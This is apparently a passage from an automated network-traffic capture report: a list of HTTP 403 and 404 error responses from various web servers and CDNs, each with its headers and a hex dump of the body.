                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: 1c6a5729-7fde-4601-bb79-4e7a486ec594CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r%2FJHFxjbjCEfZ%2F1rUUX1eRqaXoOxiVTGk9iLabxqJ%2FPY%2F%2FcienCfut79TQx8N80KK16LU35h0y7iRdgrD3HGww5FOS09e6HXj7JPLNCasUukc0JpX9hYzdBBPEGJ%2FbA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=145.999908Server: cloudflareCF-RAY: 7a59a85fb8362c39-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:56:25 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 10 Mar 2023 06:56:26 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:26 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:26 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Fri, 10 Mar 2023 06:56:27 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:26 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 10 Mar 2023 06:56:26 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:26 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Mar 2023 06:56:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 3d59761c-4414-4b94-b8c7-0aa500b47cfdCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yR9Y8myBIptRmAseETp3AqBbdtk4pBrHRgtIchkCYECljuu2croZyg9zGqqmh4F3ftGwx2hPWDivHASzdDgjW7iS7k9jCyuc9%2FKD4HReI4u7lysSbGxK78M5UpSc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=157.999992Server: cloudflareCF-RAY: 7a59a865bd9f2d04-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Zen-Fury: 4562ff6609dce8cc0a84b2bdb10241d050189a6dServer: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Fri, 10 Mar 2023 06:56:26 GMTX-Cache-Status: Data Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 38 37 39 36 22 2c 20 31 36 37 38 34 33 31 33 33 34 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 35 32 31 38 37 36 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC8796", 1678431334, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1652187628"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1652187628"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:26 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:26 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TszESSrOLrb13waAt1IFCVtlpSsa7O%2Fr4imoaKqwLw9pyVjXcZUo2T%2FZuQzU6sEFToZnSVktT6h3sWobsmwd55P%2FMNRsM4NOOe2urEVlCD2XgNvxD4NGedIvJWA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a86889886922-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:56:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Fri, 10 Mar 2023 06:56:42 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5bGMto13lyKl0LW27tpf88eOr6LPvdhVJcMER7CI02SbjVZGlA6f3xWAzbKDTtJVCKxmDiOzB7KVYQSJ6s39xa5EWpmIjCuml7q9%2BRshTn%2FPuWOOk0JpVKWbGWSukA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7a59a8693f7837fd-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 